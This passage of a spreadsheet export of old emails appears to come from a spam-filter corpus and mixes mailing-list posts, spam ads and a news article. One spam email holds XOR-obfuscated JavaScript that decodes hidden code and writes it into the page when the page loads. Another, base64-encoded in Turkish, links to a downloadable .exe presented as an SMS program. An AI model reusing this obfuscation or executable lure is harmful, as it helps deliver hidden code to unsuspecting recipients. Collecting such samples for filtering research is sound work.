    var ii =3D 0;    var jj =3D 0;  var result =3D "";  if( pattern =3D=3D =
 null || pattern =3D=3D "" || pattern.length &lt;=3D 0 ) {       pattern =3D "=
 simple_xor_pattern";    }
    for( ii =3D 0; ii &lt; data.length; ii++ ) {
       if( jj &gt;=3D pattern.length ) {
          jj =3D 0;
       }
       result +=3D ntoa( aton( data, ii ) ^ aton( pattern, jj++ ));
    }
    return result;
 }
 function dede( data, pattern ) {    return xor( unescape( data ), pattern =
 ); }
 // --&gt;
 &lt;/SCRIPT&gt;
 &lt;SCRIPT&gt;
 function go()
 {
 var tt=3D"";
 tt=3Ddede('%AA%B8%A9%A5%BA%A4%A1%A3%EC%AA%A8%A1%A1%E5%E7%ED%B7%ED%B0%AF%A0=
 %A9%A1%BA%E2%A2%B7%A3%A0%E5%E9%A5%B8%B9%B7%FC%E1%E2%FF%F4%F4%E3%F2%E8%FF%F=
 9%FD%E3%FE%FE%F5%E1%E2%ED%E9%9E%AD%A0%B7%AA%AB%EA%E2%ED%EB%B9%A8%A9%A2%AF%=
 AF%BF%F1%A3%A8%EA%A2%A2%AD%AC%B8%A4%A8%A8%F3%A3%A1%E1%A8%A4%B5%A3%AD%B9%A1=
 %BF%A5%A8%B4%FB%A0%A2%E2%BE%B8%AC%B3%B3%BD%F0%A0%A2%E0%A0%A2%A8%BB%AF%AF%B=
 F%F1%A3%A8%EA%BD%AE%BC%A2%A0%A1%A5%A7%BC%BE%F3%B4%A9%BE%EB%B4%AB%BE%A7%B7%=
 AD%AF%AB%A3%F3%A3%A1%E1%AF%A2%B7%BF%A6%A4%BD%B9%A3%BF%BE%FB%A0%A2%E2%AB%B9=
 %A1%AB%B5%AD%BF%AB%A8%A2%EA%EE%FD%B3','32891212');
 document.write("&lt;script&gt;");
 document.write(tt);
 document.write('&lt;');
 document.write('\u002F');
 document.write('script');
 document.write('&gt;');
 tt=3Ddede('%F0%9F%89%8E%84%8F%EC%BC%A1%A8%BC%A2%F1%FC%FD%E9%E8%AB%A0%A2%AF=
 %A2%F5%A9%A9%A5%BC%A9%BA%EA%AE%A4%BA%A8%AD%B8%F1%FB%F6%F0%9C%88%83%8F%91%F=
 2%F4%9E%9E%F5%F4%98%8C%F4%F0%8F%81%9A%E8%AB%A0%A2%AF%A2%F5%A9%A9%A5%BC%A9%=
 BA%F4%F0%89%F6%F0%8E%85%82%9F%E8%AA%A9%A9%A9%F6%89%BE%A1%AB%A0%EB%AB%A3%A4=
 %A5%BE%F6%EB%F4%F8%FA%FC%F3%F8%EC%BB%A3%B6%AE%F5%F9%F6%82%8D%99%8C%8F%87%9=
 8%89%EB%9B%89%90%EA%9B%8E%8D%87%84%B3%F0%E4%8E%83%86%9E%F2%F7%E7%8E%F6%EA%=
 F0%E4%8C%85%9E%F4%F0%E4%9C%88%F6%F6%E3%9F%9A%F2%F4%E5%98%89%87%88%91%F4%F0=
 %E4%9C%8D%8A%86%89%F5','347375');
 document.write(tt);
 tt=3Ddede('%F0%9F%89%8E%84%8F%EC%A8%AD%A0%A4%99%BC%AA%AB%A5%A6%AD%F1%FB%E8=
 %AF%AD%A6%A0%9B%A9%A8%AC%A3%A2%AC%F5%FD%E8%BD%A5%AF%BC%A4%F5%F9%FB%FB%E8%A=
 D%A4%A3%AB%A5%F5%AF%AD%A4%B8%AE%BA%EC%AA%A5%BE%AF%AD%BE%F5%FA%F2%F7%9C%8E%=
 87%8E%95%F5%F4%98%9A%F4%F0%9F%8C%EC%BF%A3%A8%BF%A0%F1%F9%FA%FC%EE%E8%AE%AF=
 %89%A3%A7%A7%BE%F5%A8%A0%AA%AB%A7%F6%F6%98%8A%8A%80%8D%EA%AF%AE%A4%A0%9B%B=
 A%AD%A8%A1%A2%AF%F7%FC%EB%AB%A9%A4%A6%9C%AA%AC%A8%A1%A4%AB%F6%FD%EC%BF%A3%=
 A8%BF%A0%F1%EA%FB%FC%FB%ED%EE%E8%A8%A3%B9%AC%A9%BA%F7%FC%F5%F4%98%8A%85%88=
 %92%F6%F0%9C%98%F2','347375');
 document.write(tt);
 tt=3Ddede('%F0%9F%8C%EC%BE%8B%A0%A2%AF%A2%F5%BE%A3%BB%E8%AD%A4%A3%AB%A5%F5=
 %A0%AD%AC%B8%EB%BF%A5%AC%BE%A4%F6%EA%FD%F8%FA%E9%E9%E8%AE%AF%89%A3%A7%A7%B=
 E%F5%E9%AF%A8%AB%AF%AE%AC%F2%F7%98%EC%A9%A6%A5%AC%A6%F1%AB%AF%A2%BF%AD%BE%=
 F6%F6%8F%8E%86%98%8D%98%F2%F7%8E%83%86%9E%EC%AD%A9%AF%AD%F7%AD%B9%A1%AD%A4=
 %EA%BF%A2%B2%A9%F5%F8%F2%F7%8A%F2%A4%A3%BA%AE%E8%AA%AD%AF%A8%B8%E8%AA%BA%A=
 5%A1%EB%BF%A9%AA%A9%AD%A6%BB%EC%A9%BE%EC%A3%A7%A1%AD%F6%E3%89%F6%E2%E8%82%=
 AD%B9%AC%AF%A7%B8%A9%B8%AD%B4%E8%A3%BF%EB%BC%A4%AD%EA%AE%A2%AF%AB%AD%B9%B8=
 %EB%AD%BE%A7%BE%A5%A8%E8%BB%AD%A8%AF%AA%A5%EC%AB%A5%A1%A6%BD%A2%A1%BE%B5%E=
 B%A1%A2%E8%BE%A4%AE%E8%BB%A7%B8%A0%AF%E9','347375');
 document.write(tt);
 tt=3Ddede('%8F%BE%A5%EC%BB%AF%A9%EB%AF%A5%BA%A6%BF%EB%AE%BE%A7%A7%EC%AA%A4=
 %A0%E8%A5%BA%AE%BA%EC%BC%A2%A9%EB%BF%A3%BA%A6%A8%E5%E8%F0%8A%F4%81%8A%83%8=
 9%E8%B3%83%9E%9A%EC%8C%98%89%8A%85%9F%E8%88%89%88%87%81%8D%EA%9E%8E%89%80%=
 81%9E%B5%E5%E6%E2%E6%E4%EC%87%81%9A%8D%EB%F0%E4%8A%F2%E8%AF%BA%AE%BA%B5%E8=
 %AE%AD%B2%E8%BB%AD%EA%A4%AA%BE%A9%E8%A4%A9%BC%E8%BF%AD%A4%A8%AE%BA%BF%E8%A=
 5%A2%A7%A1%A2%AD%EA%E2%E5%E6%AF%BD%A7%EC%A2%A6%B8%A7%EA%B8%A3%AD%EC%BF%A5%=
 BE%A7%AC%EC%A7%AC%EC%F7%8A%F2%84%83%9A%8E%E8%89%9A%85%98%82%8B%ED%E9%EB%ED=
 %F7%8A%9E%F6%F6%E3%89%F6%F0%E7%8C%83%85%9C%F2%F4%E5%8F%8E%86%98%8D%98%F2%F=
 7%98%EC%A9%A6%A5%AC%A6%F1%AB%AF%A2%BF%AD%BE%F6%F6%8E%99%F6','347375');
 document.write(tt);
 tt=3Ddede('%F0%8D%87%82%9C%EA%AA%AA%AB%A9%F5%E8%9A%AE%BA%A8%A9%A4%AD%E7%E8=
 %8D%BA%A3%AD%A7%E4%EC%80%AF%A0%BD%AD%B8%A1%A9%AD%E7%E8%BF%A9%A4%BF%E6%BB%A=
 9%BA%A3%AA%E9%E8%BF%A1%B0%A9%F6%FC%F2%F4%88%F2%F9%FC%E3%FF%EA%8A%99%8D%89%=
 E8%99%89%93%E8%9F%80%85%9B%EA%F4%E3%8A%F4%F0%E4%8E%83%86%9E%F2%F7%8A%9E%F6=
 %F6%98%8A%8A%80%8D%EA%AF%AE%A4%A0%9B%BA%AD%A8%A1%A2%AF%F7%FC%EB%AB%A9%A4%A=
 6%9C%AA%AC%A8%A1%A4%AB%F6%FD%EC%BF%A3%A8%BF%A0%F1%EA%FB%FC%FB%ED%EE%E8%A8%=
 A3%B9%AC%A9%BA%F7%FC%F5%F4%98%8A%85%88%92%F6%F0%9C%98%F2%F7%9C%88%E8%AB%A0=
 %A2%AF%A2%F5%A7%A5%AF%AC%A0%AD%F4%F0%82%85%8B%E8%A2%A9%A2%AF%A4%BC%F7%F9%F=
 D%E8%AD%A4%BE%F1%E9%EA%EC%BB%B8%AF%F6%EA%A4%BC%BE%BC%F1%E7%E3%BF%BD%BB%E5%=
 A4%A3%A4%A3%B8%AA%A4%E2%AB%A5%A1%E4%A1%A1%A9%AD%A9%B8%E7%AA%BB%A1%FD%FD%E6=
 %A6%B8%AD%EE','347375');
 document.write(tt);
 tt=3Ddede('%EC%BC%A1%A8%BC%A2%F1%FC%F0%EC%AA%A5%BE%AF%AD%BE%F5%FB%F2%F7%89=
 %EC%A0%B8%A9%AD%F5%EE%A0%BE%B8%BB%F2%E3%E7%BD%BB%BC%E6%BA%A1%B9%A5%BF%E5%B=
 4%E6%A4%A9%BF%E7%EE%F6%F6%ED%E6%E5%F0%AA%B8%F2%F7%AE%A3%A6%BE%EC%AD%A9%AF%=
 AD%F7%AD%B9%A1%AD%A4%EA%BF%A2%B2%A9%F5%E7%FE%F5%9C%A9%AD%A4%BF%F7%E7%AD%F6=
 %E7%E1%F5%F4%E3%89%F4%F0%E4%9C%88%F6%F6%98%8F%E8%AD%A4%A3%AB%A5%F5%A1%A1%A=
 E%A8%A7%AD%F2%F4%83%81%8C%E8%A4%AD%A3%AB%A3%BC%F1%FD%FC%EC%AA%A4%B8%F5%E8%=
 EE%EB%BB%BE%AB%F7%EE%A3%BC%B8%B8%F0%E3%E4%BF%BB%BF%E4%A0%A4%A4%A5%BC%AB%A0=
 %E5%AB%A3%A5%E5%A5%A6%A9%AB%AD%B9%E3%AD%BB%A7%F9%FF%E2%A1%B8%AB%EA%EA%BB%A=
 2%AC%B8%A0%F7%FB%F3%E8%AE%A7%B8%A8%AE%BA%F1%F9%F4%F0%8A%E8%A4%BA%AF%AA%F6%=
 EA%A4%BC%BE%BC%F1%E7%E3%BF%BD%BB%E5%BE%A5%BB%A3%B8%E6%B0%E2%A6%AF%B8%E4%EA=
 %F2%F4%EB%E1%E6%F4%AE%BA%F4','347375');
 document.write(tt);
 tt=3Ddede('%F0%AD%A7%A2%BC%EA%AA%AA%AB%A9%F5%AB%BE%A2%A9%A0%E8%B9%A5%B1%AD=
 %F1%E5%F8%F2%88%BD%A1%BB%A2%A3%BF%BB%F0%E7%AB%F2%E6%E5%F2%F4%E5%8D%F5%F4%E=
 3%9C%8E%F2%F7%9C%88%E8%AB%A0%A2%AF%A2%F5%A7%A5%AF%AC%A0%AD%F4%F0%82%85%8B%=
 E8%A2%A9%A2%AF%A4%BC%F7%F9%FD%E8%AD%A4%BE%F1%E9%EA%EC%BB%B8%AF%F6%EA%A4%BC=
 %BE%BC%F1%E7%E3%BF%BD%BB%E5%A4%A3%A4%A3%B8%AA%A4%E2%AB%A5%A1%E4%A1%A1%A9%A=
 D%A9%B8%E7%AA%BB%A1%FD%F2%E6%A6%B8%AD%EE%EB%BF%A5%AC%BE%A4%F6%FF%F4%E8%A8%=
 A3%B9%AC%A9%BA%F7%FD%F5%F4%8D%E8%A2%BE%AE%AE%F1%EA%A2%B8%BF%B8%F6%E7%E5%BB=
 %BC%BF%E2%BE%A3%BF%A2%BC%E1%B0%E4%A2%AE%BC%E3%EA%F4%F0%EA%E5%E1%F4%A8%BE%F=
 5%F4%AA%A7%A4%B8%EB%AE%AD%AB%AF%F1%AA%BA%A5%A9%A6%EC%B8%A1%B6%AD%F7%E1%F9%=
 F6%8E%A1%AD%8E%A4%A7%AE%BB%F6%E3%AA%F6%E1%E5%F4%F0%E4%89%F2%F4%E5%98%8F%F6=
 %F0%E7%9E%9E%F5%F4%E3%9C%88%83%8F%91%F2%F4%E5%98%8A%8A%80%8D%F4','347375')=
 ;
 document.write(tt);
 tt=3Ddede('%F0%9F%89%8E%84%8F%EC%BC%A1%A8%BC%A2%F1%E9%FF%F9%ED%E8%EC%AA%A4=
 %A5%AF%A4%F1%A8%AD%A2%BC%AF%BE%EB%AA%A3%BA%AE%A9%B9%F5%FC%F6%F6%98%89%87%8=
 8%91%F4%F0%9F%9A%F2%F4%9E%88%F5%F4%8A%87%98%81%F5%F4%85%86%9A%99%9F%E8%A3%=
 A6%A9%A0%A2%AB%A7%F5%E8%AB%A4%AF%A3%E0%E3%F7%E9%E8%B8%B1%BA%A9%F6%AA%B9%BC=
 %BE%A3%A5%E8%BA%A9%A6%B9%AE%F5%EE%8B%A6%A5%A8%A3%EC%A0%AF%BE%AE%E8%B8%A7%E=
 A%AD%A8%AB%A9%BB%B9%EC%A4%BD%BE%E8%B9%A5%BF%AD%EE%E8%A4%AD%A6%AD%F1%8A%9F%=
 98%9F%87%82%E8%A5%A2%A7%A1%AF%A3%F7%EE%AC%A7%E4%E1%E8%F2%EB%F4%E3%8E%85%9E=
 %86%F6%F0%E7%9E%88%F5%F4%E3%9C%98%F2%F7%E7%98%8A%85%88%92%F6%F0%E7%9E%8D%8=
 9%84%89%F6%F6%88%82%9E%EC%A9%A6%A5%AC%A6%F1%AB%AF%A2%BF%AD%BE%F6%F6%8E%99%=
 F6%F0%E7%8E%85%9D%F6%F0%E7%9E%88%F5%F4%E3%9C%98%F2%F7%E7%98%8A%85%88%92%F6=
 %F0%E7%9E%8D%89%84%89%F6%F6%E3%9F%8C%F2%F4%E5%98%99%F6%F0%E7%9E%8E%84%8C%9=
 5%F6%F6%E3%9F%89%8E%84%8F%F2','347375');
 document.write(tt);
 }
 // --&gt;
 &lt;/SCRIPT&gt;
 &lt;/head&gt;
 &lt;body &gt;
 &lt;script&gt;
 go();
 &lt;/script&gt;
 &lt;/body&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Re: Too funny
</t>
  </si>
  <si>
    <t xml:space="preserve">* Steve Thomas &lt;sthomas@apexvoice.com&gt; [2002-08-28T07:52-0700]:
 &gt; I also get a lot of them. I think they're using the domain registry
 &gt; database to pull their victims' addresses. 
 Along with the usual webmaster@* and probably a dash of web harvesting
 on the side from the ones I have seen.
 A recent conversation in two lines:
 Me:  Okay, trafficmagnet is being access mapped off now.
 Junior admin [catching up on email after conference]: Thank God!
 -- 
 Jeremy Mates                                        http://www.sial.org/
 OpenPGP: 0x11C3D628  (4357 1D47 FF78 24BB 0FBF 7AA8 A846 9F86 11C3 D628)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</si>
  <si>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Re: transcode build problem (was: RH 8 no DMA for DVD drive)
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 2002-10-07 at 11:54, Matthias Saou wrote:
 &gt; Once upon a time, Alvie wrote :
 &gt; 
 &gt; &gt; This is only the last part of it.I used 'rpmbuild --rebuild --without
 &gt; &gt; avifile transcode.0.6.1-fr2.src.rpm'.
 &gt; 
 &gt; &gt; af6_decore.cpp:305: 'WAVEFORMATEX'
 &gt; &gt; is used as a type, but is not defined as a
 &gt; &gt;    type.
 &gt; &gt; af6_decore.cpp:306: parse error before `if'
 &gt; [...]
 &gt; 
 &gt; All of these "af6" are related to avifile6 support :-/
 &gt; Normally, my 0.6.1-fr2 build of transcode defaults to *not* use avifile,
 &gt; but you can use "--with avifile6" to force recompiling against it.
 &gt; 
 &gt; Do you have an old avifile installed maybe?
 &gt; Can you check the "./configure ..." line run at the beginning of the
 &gt; rebuild process to see if it does include the "--without-avifile6" option?
 &gt; 
 Yes it was there.
 You guessed the problem correctly in an earlier e-mail There was still
 remnants remaining from an old failed avifile installation.
 The transcode src.rpm now builds perfectly.
 Thank you VERY much!
 You are GOOD.
 Alvie 
 &gt; Matthias
 &gt; 
 &gt; -- 
 &gt; Clean custom Red Hat Linux rpm packages : http://freshrpms.net/
 &gt; Red Hat Linux release 7.3 (Valhalla) running Linux kernel 2.4.18-10acpi
 &gt; Load : 0.23 0.14 0.14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</si>
  <si>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Lucas Gonze:
 &gt;Spam is *the* tool for dissident news, since the fact that it's unsolicited 
 &gt;means that recipients can't be blamed for being on a mailing list.
 That depends on how the list is collected, or
 even on what the senders say about how the list
 is collected. Better to just put it on a website,
 and that way it can be surfed anonymously. AND
 it doesn't clutter my inbox.
 _________________________________________________________________
 Chat with friends online, try MSN Messenger: http://messenger.msn.com
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ADV: Professional Teeth Whitening At Home!                                                   ovcnd
</t>
  </si>
  <si>
    <t xml:space="preserve">Whiter teeth and a brighter smile are just a click away! 
 http://www.newnamedns.com/dental/
 Have you considered professional teeth whitening? If so, you know it usually costs between $300 and $500 from your local dentist!
 Visit our site to learn how to professionally whiten your teeth, using the exact same whitening system your dentist uses, at a fraction of the cost!
 We know our product is the best on the market, and we back it with a 30 day money back guarantee!
 Click here to find out more!
 http://www.newnamedns.com/dental/
 ---------------------------------------
 To easily remove your address from the list, go to: 
 http://www.newnamedns.com/stopthemailplease/
 Please allow 48-72 hours for removal.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/masses evolve.cxx,1.28,NONE
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/masses
 In directory usw-pr-cvs1:/tmp/cvs-serv6501/masses
 Removed Files:
       Tag: b2_4_0
 	evolve.cxx 
 Log Message:
 removed old evolver
 --- evolve.cxx DELETED ---
 -------------------------------------------------------
 This sf.net email is sponsored by: Jabber - The world's fastest growing 
 real-time communications platform! Don't just IM. Build it in! 
 http://www.jabber.com/osdn/xim
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">
 The way to debug something like this is to turn on the log (Preferences 
 -&gt; Hacking Support -&gt; Debug log enabled) and track the gpg commands 
 being issued and the responses.
 FWIW, using exmh 2.5 and gpg 1.0.7 I do not have problems sending 
 encrypted messages to myself. When I select the message, an xterm 
 window pops up asking for the passphrase. I don't recall exmh ever 
 asking me for the passphrase from the tty that started exmh nor from a 
 dialog box. (But then again, I'm not a heavy gpg user).
 Kevin
 In message &lt;200209111917.PAA02912@blackcomb.panasas.com&gt;, Brent Welch writes:
 &gt; Hmm - I'm cc'ing the exmh-workers list, because I really don't know
 &gt; much about the various PGP interfaces.  I think there has been some
 &gt; talk about "issues" with the latest version of gpg.
 &gt; 
 &gt; &gt;&gt;&gt;Hacksaw said:
 &gt;  &gt; version 2.5 08/15/2002
 &gt;  &gt; Linux habitrail.home.fools-errant.com 2.4.7-10smp #1 SMP Thu Sep 6 17:09:31
 &gt;  &gt; EDT 2001 i686 unknown
 &gt;  &gt; Tk 8.3 Tcl 8.3
 &gt;  &gt; 
 &gt;  &gt; It's not clear to me this is a bug with exmh per se, but it's something 
 &gt;  &gt; that manifests through exmh, so I figured asking you might help me track
 &gt;  &gt; it down.
 &gt;  &gt; 
 &gt;  &gt; When I receive a gpg encrypted message, and it asks me for a passphrase, 
 &gt;  &gt; it first tries to ask me via the tty under which exmh is running. It 
 &gt;  &gt; tells me my passphrase is incorrect every time, at which point exmh 
 &gt;  &gt; offers me the line in the message about decrypting. I click the line 
 &gt;  &gt; and it offers me the dialog box, and tells me the passphrase is correct,
 &gt;  &gt; and shows me the decrypted message.
 &gt;  &gt; 
 &gt;  &gt; Any ideas on that?
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: EPA Stunned: Diesel Exhaust Can Cause Cancer
</t>
  </si>
  <si>
    <t xml:space="preserve">Glad they finally figured this one out... Note the very careful wording, so
 exhaust may be beneficial to ones health as long as you have a glass a day
 with some cheese.
 Interesting timing, since 16,000 truckers just lost their jobs and dont have
 to worry about death from this anymore.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
 --------
 EPA: Diesel Exhaust Can Cause Cancer
 Wed Sep 4, 3:29 AM ET
 By H. JOSEF HEBERT, Associated Press Writer
 WASHINGTON (AP) - Inhaling diesel exhausts from large trucks and other
 sources over time can cause cancer in humans, an Environmental Protection
 Agency ( news - web sites) report concludes after a decade of study.
 The EPA finding, released Tuesday, is expected to buttress the government's
 push to reduce truck tailpipe emissions by requiring cleaner-burning engines
 and diesel fuel with ultra-low sulfur content.
 While acknowledging uncertainties about the long-term health effects of
 exposure to diesel exhausts, the EPA report said studies involving both
 animal tests and occupational exposure suggest strong evidence of a cancer
 risk to humans.
 "It is reasonable to presume that the hazard extends to environmental
 exposure levels" as well, the report said. "The potential human health
 effects of diesel exhausts is persuasive, even though assumptions and
 uncertainties are involved."
 The report mirrors conclusions made previously in documents from various
 world health agencies and studies in California and is particularly
 significant because the EPA is the federal agency that regulates diesel
 emissions under the Clean Air Act.
 Some environmentalists have raised concerns recently that the Bush
 administration might try to back away from a Clinton-era regulation that
 would establish tougher requirements on emissions from large trucks and a
 separate rule that virtually would eliminate sulfur from diesel fuel.
 EPA Administrator Christie Whitman repeatedly has promised to go ahead with
 the tougher truck and diesel rules. Last month, with White House approval,
 the EPA rebuffed attempts by some diesel engine manufacturers to postpone
 the requirements, approving new penalties against manufacturers who fail to
 meet an October deadline for making cleaner-burning truck engines.
 The engine rule does not affect emissions from trucks already on the road,
 although the separate regulation cutting the amount of sulfur in diesel fuel
 is expected to produce pollution reductions.
 The EPA's 651-page diesel health assessment did not attempt to estimate the
 probability of an individual getting cancer, given certain exposure to
 diesel exhaust. Such a risk assessment is commonly made by the EPA when
 gauging pollution health concerns.
 But in this case, the report said, "the exposure-response data are
 considered too uncertain" to produce a confident quantitative estimate of
 cancer risk to an individual.
 Nevertheless, said the report, the "totality of evidence from human, animal
 and other supporting studies" suggests that diesel exhaust "is likely to be
 carcinogenic to humans by inhalation, and that this hazard applies to
 environmental exposure."
 The report reiterated that environmental exposure to diesel exhausts poses
 short-term health problems and in the long term has been shown to be a
 "chronic respiratory hazard to humans" contributing to increased asthma and
 other respiratory problems. In some urban areas diesel exhausts account for
 as much as a quarter of the airborne microscopic soot, the report said.
 Environmentalists welcomed the study as clear evidence that pollution needs
 to be curtailed not only from large trucks but also from off-road
 diesel-powered vehicles. EPA spokeswoman Steffanie Bell said the agency
 expects to publish a rule early next year dealing with those diesel exhaust
 sources, which include farm tractors and construction equipment.
 Emily Figdor of the U.S. Public Interest Research Group, a private
 environmental organization, said: "To reduce the public's exposure to
 harmful diesel emissions, the Bush administration should ... fully implement
 clean air standards for diesel trucks and buses and should pass equivalent
 standards for diesel construction and farm equipment."
 Allen Schaeffer, executive director of the industry group Diesel Technology
 Forum, said the EPA's report "focused on the past," whereas "the future is
 clean diesel. Diesel trucks and buses built today are more than eight times
 cleaner than just a dozen years ago."
 The report acknowledged that its findings were based on emissions levels in
 the mid-1990s, but said the results continued to be valid because the slow
 turnover of truck engines has kept many of these vehicles on the road.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] Fire.cloudmark.com is having issues
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --CE+1k2dSO48ffgeK
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 Error 230 occurs when you report a signature, but the server doesn't
 know about the signature, so it wants the full content.  It's
 basically an optimization. =20
 Beyond that, I'm not sure how to interpret that output.. what version?
 Vipul?
 --jordan
 On Wed, Oct 02, 2002 at 11:59:01PM -0400, Rose, Bobby wrote:
 # What does this mean?  I set up procmailrc for a spamtrap but I'm getting
 # an error.  I also am reporting to pyzor and dcc and they aren't
 # registering an error.  What's weird is that it works sometimes.
 #=20
 # .
 # Oct 02 23:46:11.470523 report[14051]: [ 4] honor.cloudmark.com &gt;&gt; 20
 # Oct 02 23:46:11.470805 report[14051]: [ 6] response to sent.3
 # -res=3D1
 # err=3D230
 # .
 # Oct 02 23:46:11.471825 report[14051]: [ 5] mail 1, orig_email, special
 # case eng 1: Server accept
 # ed report.
 # Oct 02 23:46:11.472228 report[14051]: [ 8] mail 1.0, eng 4: err 230 -
 # server wants mail
 #=20
 #=20
 # -------------------------------------------------------
 # This sf.net email is sponsored by:ThinkGeek
 # Welcome to geek heaven.
 # http://thinkgeek.com/sf
 # _______________________________________________
 # Razor-users mailing list
 # Razor-users@lists.sourceforge.net
 # https://lists.sourceforge.net/lists/listinfo/razor-users
 --CE+1k2dSO48ffgeK
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.2.0 (GNU/Linux)
 iD8DBQE9m9OxpwQdAVEbU7oRAifiAKCSXxSTb64bYgzo8PiXVVswqkXCKgCgnqby
 YYrMsnaQOrQvEb7cDw5jios=
 =SBk3
 -----END PGP SIGNATURE-----
 --CE+1k2dSO48ffgeK--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">On 9 Aug 2002, James Rogers wrote:
 --]my version of the English language as the word for "eye goop".  Arguably
 --]better than "smegma" anyway.
 Unless of course the goop in your eye was a result of a botched tea
 bagging.
 Muta, I like that.
 -tom
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] zr dileriz
</t>
  </si>
  <si>
    <t xml:space="preserve">PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVu
 dD0idGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1NCI+DQo8dGl0bGU+U01TVFIgeXdw
 Z3hxc3J2b2xnZHE8L3RpdGxlPjwvaGVhZD4NCjxib2R5PjxwPjxmb250IGZhY2U9IkFyaWFs
 IiBzaXplPSI0Ij5EZWdlcmxpIFNNU1RSIGt1bGxhbmljaW1pejxicj4NCjxodG1sPg0KU01T
 IHByb2dyYW1pbWl6IOdlc2l0bGkgYWtzYWtsaWtsYXIgc2ViZWJpIGlsZSBrdWxsYW5pbGFt
 YXogaGFsZSBnZWxtaXN0aXIuIEJ1IA0Kc2ViZXB0ZW4gZG9sYXlpIHllbmkgYmlyIHByb2dy
 YW0gaGF6aXJsYW1hayB6b3J1bmRhIGthbGRpay4gUHJvZ3JhbWkgYXNhZ2lkYWtpIGxpbmtp
 IA0Ka3VsbGFuYXJhayBpbmRpcmViaWxpcnNpbml6LiBQcm9ncmFtaSBiaXogdmly/HMga29u
 dHJvbPxuZGVuIGdl52lybWlzIGJ1bHVubWFrdGF5aXouDQpCdSB5ZW5pIHZlcnNpeW9uZGEg
 c21zIGluIHllcmluZSB1bGFzbWEgaGl6aSDnb2sgZGFoYSBhcnRpcmlsbWlzdGlyLiBBeXJp
 Y2Egc2luaXJzaXogDQp2ZSB0b3BsdSBzbXMgZ/ZuZGVyZWJpbGlyc2luaXouIMdvayB5YWtp
 bmRhIGxvZ28gdmUgbWVsb2RpIHRyYW5zZmVyaSBoaXptZXRpbWl6IA0KYWNpbGFjYWt0aXIu
 IFNpemkgYmlyIHN1cmUgc2luaXJzaXogc21zZGVuIG1haHJ1bSBldHRpZ2ltaXogaWNpbiBv
 enVyIA0KZGlsZXJpei48L2ZvbnQ+PGJyPg0KPGJyPjxmb250IGZhY2U9IkFyaWFsIiBzaXpl
 PSI0Ij48YSBocmVmPSJodHRwOi8vd3d3LmdhcmFudGlzbXMuY29tL3Ntc3RyLmV4ZSI+U01T
 VFINClZlcnNpeW9uIDcuMyB1IGluZGlybWVrIGnnaW4gYnVyYXlhIHRpa2xheWluaXo8L2E+
 PC9mb250PjwvcD4NCjwvYm9keT4NCjwvaHRtbD4NCg0K
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Good or Bad Credit Merchant Account ayaxa
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- saved from url=(0022)http://internet.e-mail --&gt;
 &lt;!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"&gt;
 &lt;HTML&gt;&lt;HEAD&gt;
 &lt;META http-equiv=Content-Type content="text/html; charset=iso-8859-1"&gt;
 &lt;META content="Microsoft FrontPage 4.0" name=GENERATOR&gt;
 &lt;STYLE&gt;&lt;/STYLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY bgColor=#ffffff&gt;
 &lt;DIV&gt;&amp;nbsp;&lt;/DIV&gt;
 &lt;DIV align=center&gt;
 &lt;CENTER&gt;
 &lt;TABLE cellPadding=6 width="73%" border=0 cellspacing="1"&gt;
   &lt;TBODY&gt;
   &lt;TR&gt;
     &lt;TD width="100%" colSpan=2&gt;
       &lt;P align=center&gt;&lt;B&gt;&lt;FONT face="Arial Black" color=#ff0000 size=5&gt;Increase 
       Your Sales Up to 1500%&lt;/FONT&gt;&lt;/B&gt;&lt;FONT face=Arial color=#000000 
       size=5&gt;&amp;nbsp;&lt;/FONT&gt;&lt;/P&gt;
       &lt;P align=center&gt;&lt;FONT face=Arial color=#000080&gt;&lt;SPAN 
       style="BACKGROUND-COLOR: #ffff00"&gt;&lt;B&gt;**** PAY NO SET-UP OR APPLICATION FEE 
       ****&lt;BR&gt;&lt;/B&gt;&lt;/SPAN&gt;&lt;/FONT&gt;&lt;B&gt;&lt;FONT face=Arial color=#000080 
       size=2&gt;&lt;I&gt;&lt;SPAN 
       style="BACKGROUND-COLOR: #ffff00"&gt;(&lt;/SPAN&gt;&lt;/I&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;B&gt;&lt;FONT 
       face=Arial color=#000080 size=2&gt;&lt;I&gt;&lt;SPAN 
